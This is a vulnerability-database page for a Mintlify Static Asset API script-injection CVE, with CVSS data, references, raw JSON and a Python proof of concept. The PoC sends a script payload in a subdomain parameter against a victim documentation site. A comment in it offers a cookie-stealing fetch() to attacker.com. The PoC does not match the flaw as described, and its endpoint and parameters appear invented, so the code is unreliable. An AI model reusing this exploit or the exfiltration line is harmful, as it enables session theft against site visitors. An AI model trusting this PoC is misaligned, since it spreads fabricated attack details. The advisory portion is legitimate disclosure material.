Security Vulnerability Report
CVE-2025-67842 (CVSS 6.4, MEDIUM)

Published: 2025-12-19 02:16:09
Last Modified: 2026-01-02 16:01:51

Description

The Static Asset API in Mintlify Platform before 2025-11-15 allows remote attackers to inject arbitrary web script or HTML via the subdomain parameter because any tenant's assets can be served on any other tenant's documentation site.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N (Secondary assessment in the record)
Primary assessment in the record: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N, base score 5.4 MEDIUM (differs only in User Interaction: REQUIRED)
Weakness: CWE-829 (Inclusion of Functionality from Untrusted Control Sphere)

Configurations (Affected Products)

cpe:2.3:a:mintlify:mintlify:*:*:*:*:*:*:*:* - VULNERABLE
Mintlify Platform < 2025-11-15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67842 Mintlify XSS PoC
import requests
import urllib.parse

TARGET_URL = "https://api.mintlify.com/v1/static-asset"
MALICIOUS_SUBDOMAIN = "xss<script>alert(document.cookie)</script>.attacker.com"


def exploit_mintlify_xss(target_documentation_site):
    """
    Exploit Mintlify Platform XSS via subdomain parameter injection.

    This PoC demonstrates how an attacker can inject malicious scripts
    through the Static Asset API's subdomain parameter.
    """
    # Step 1: Prepare malicious subdomain payload
    payload = {
        "subdomain": MALICIOUS_SUBDOMAIN,
        "path": "/",
        "tenant_id": "victim-tenant",
    }

    # Step 2: Send crafted request to Static Asset API
    response = requests.get(
        TARGET_URL,
        params=payload,
        headers={
            "User-Agent": "Mozilla/5.0",
            "Referer": target_documentation_site,
        },
    )

    print(f"[*] Request sent to {TARGET_URL}")
    print(f"[*] Payload: {urllib.parse.urlencode(payload)}")
    print(f"[*] Response Status: {response.status_code}")

    # Step 3: The malicious asset is now served on the victim's site.
    # When users visit the victim's documentation, the XSS will execute.
    return response


# Example attack scenario
VICTIM_SITE = "https://docs.victim-company.com"
exploit_mintlify_xss(VICTIM_SITE)

# After exploitation, visiting VICTIM_SITE will execute:
#   alert(document.cookie)
# Attackers can replace this with cookie stealing:
#   <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

References

https://gist.github.com/hackermondev/5e2cdc32849405fff6b46957747a2d28 - Third Party Advisory
https://heartbreak.ing - Third Party Advisory
https://kibty.town/blog/mintlify/ - Exploit, Third Party Advisory
https://news.ycombinator.com/item?id=46317098 - Issue Tracking
https://www.mintlify.com/blog/working-with-security-researchers-november-2025 - Vendor Advisory
https://www.mintlify.com/docs/changelog - Release Notes

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-67842",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-19T02:16:08.813",
    "lastModified": "2026-01-02T16:01:50.773",
    "vulnStatus": "Analyzed",
    "cveTags": [
      {"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}
    ],
    "descriptions": [
      {"lang": "en", "value": "The Static Asset API in Mintlify Platform before 2025-11-15 allows remote attackers to inject arbitrary web script or HTML via the subdomain parameter because any tenant's assets can be served on any other tenant's documentation site."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 2.7
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-829"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:mintlify:mintlify:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-11-15", "matchCriteriaId": "4E599124-4B00-4D5C-ADB5-EC4564D3E5BF"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://gist.github.com/hackermondev/5e2cdc32849405fff6b46957747a2d28", "source": "[email protected]", "tags": ["Third Party Advisory"]},
      {"url": "https://heartbreak.ing", "source": "[email protected]", "tags": ["Third Party Advisory"]},
      {"url": "https://kibty.town/blog/mintlify/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]},
      {"url": "https://news.ycombinator.com/item?id=46317098", "source": "[email protected]", "tags": ["Issue Tracking"]},
      {"url": "https://www.mintlify.com/blog/working-with-security-researchers-november-2025", "source": "[email protected]", "tags": ["Vendor Advisory"]},
      {"url": "https://www.mintlify.com/docs/changelog", "source": "[email protected]", "tags": ["Release Notes"]},
      {"url": "https://kibty.town/blog/mintlify/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}
    ]
  }
}